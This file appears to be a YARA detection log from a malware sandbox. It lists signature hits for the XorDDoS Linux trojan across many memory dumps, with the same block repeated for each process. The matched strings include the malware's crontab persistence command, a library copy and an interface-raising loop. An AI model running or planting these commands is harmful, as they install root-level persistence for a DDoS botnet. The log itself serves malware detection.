6249.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6249.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6249.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6249.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6249.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6249.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6249.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6312.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6312.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6312.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6312.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6312.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6312.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6312.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6282.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6282.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6282.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6282.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6282.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6282.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6282.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6542.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6542.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6542.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6542.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6542.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6542.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6542.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6320.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6320.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6320.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6320.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6320.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6320.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6320.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6246.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6246.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6246.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6246.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6246.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6246.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6246.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6424.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6424.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6424.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6424.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6424.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6424.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6424.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6456.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6456.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6456.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6456.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6456.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6456.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6456.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6496.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6496.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6496.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6496.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6496.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6496.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6496.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6323.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6323.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6323.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6323.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6323.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6323.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6323.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6317.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6317.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6317.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6317.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6317.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6317.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6317.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6441.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6441.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6441.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6441.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6441.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6441.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6441.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6206.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6206.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6206.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6206.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6206.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6206.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6206.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6277.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6277.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6277.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6277.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6277.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6277.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6277.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
